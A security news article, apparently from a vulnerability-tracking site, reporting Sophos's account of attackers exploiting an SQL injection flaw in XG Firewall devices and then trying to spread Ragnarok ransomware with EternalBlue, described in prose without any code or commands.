Show vulnerabilities with patch / with exploit
22 May 2020

Hackers attempted to exploit zero-day flaw in Sophos firewall to deploy ransomware


Hackers attempted to exploit zero-day flaw in Sophos firewall to deploy ransomware

British security software and hardware company Sophos has published an update regarding its investigation into recent cyber attacks where threat actors were attempting to exploit an SQL-injection flaw (CVE-2020-12271) in its XG Firewall devices to deploy Asnarök malware. This trojan was used to steal data from the firewall that could have allowed the attackers to compromise the network remotely.

According to Sophos, after the company issued hotfix to remediate the issue, attackers modified their attack routine to replace their original data-stealing payload and deploy ransomware on Windows machines in corporate networks with Sophos firewalls installed.

“In the hours after Sophos issued hotfixes that secured firewalls targeted by unknown threat actors, the attackers pivoted to a new phase of the attack, adding new components—including files intended to spread ransomware to unpatched Windows machines inside the network. Unfortunately for the threat actors, the hotfixes also prevented the subsequent attempted attacks,” Sophos said.

The original attacks took place in late April this year. In a report published at the time the company said the attackers had identified and exploited the SQL injection vulnerability to insert a one-line command in to the firewall database. This command caused affected devices to download a Linux shell script named Install.sh from a remote server. The script then executed more SQL commands and dropped more files onto the virtual file system.

In the new report Sophos revealed that after learning of the hotfix the attackers began to alter their scripts on hacked firewalls to use a 'dead man switch' (a Linux shell script) that would trigger the ransomware attack in case if a specific file attackers created was deleted, or if the firewall was rebooted. Sophos blocked this attack by deleting the malicious scripts and applications, which prompted the attackers to change their plans once again.

In the new attack, threat actors attempted to deploy Ragnarok ransomware to vulnerable Windows machines on the network using EternalBlue exploit (Windows SMB exploit to allow attackers to infect computers on the internal network beyond the firewall) and DoublePulsar implant, which is a Windows kernel implant that can be used to gain a foothold on computers on the internal network.

“The EternalBlue exploit, as implemented by the attackers in this attack, cannot infect computers running Windows 8.1 or Windows 10. The attack only succeeds against computers running older, unpatched versions of Windows 7. As a matter of course, Sophos urges everyone to patch any vulnerable machines on their network,” Sophos said.

“This incident highlights the necessity of keeping machines inside the firewall perimeter up to date, and serves as a reminder that any IOT device could be abused as a foothold to reach Windows machines,” the company added.

Back to the list

Latest Posts

REvil ransomware group announces its first ever stolen data auction

REvil ransomware group announces its first ever stolen data auction

REvil ransomware operators escalate their extortion tactics.
3 June 2020
Apple fixes recent iPhone “unc0ver” jailbreak flaw

Apple fixes recent iPhone “unc0ver” jailbreak flaw

The vendor issued the security patches less than a week after the hackers have released jailbreak tool called “Unc0ver”.
3 June 2020
DopplePaymer ransomware operators leak NASA-related files allegedly stolen from DMI

DopplePaymer ransomware operators leak NASA-related files allegedly stolen from DMI

The gang says it breached the network of one of NASA IT contractors.
3 June 2020
Featured vulnerabilities
MitM attack in GnuTLS
Medium Patched | 04 Jun, 2020
Spoofing attack in Docker
Medium Patched | 03 Jun, 2020
Information disclosure in GitLab
Medium Patched | 03 Jun, 2020
Multiple vulnerabilities in Google Chrome
High Patched | 03 Jun, 2020
Privilege escalation in ABB Central Licensing System
Medium Not Patched | 03 Jun, 2020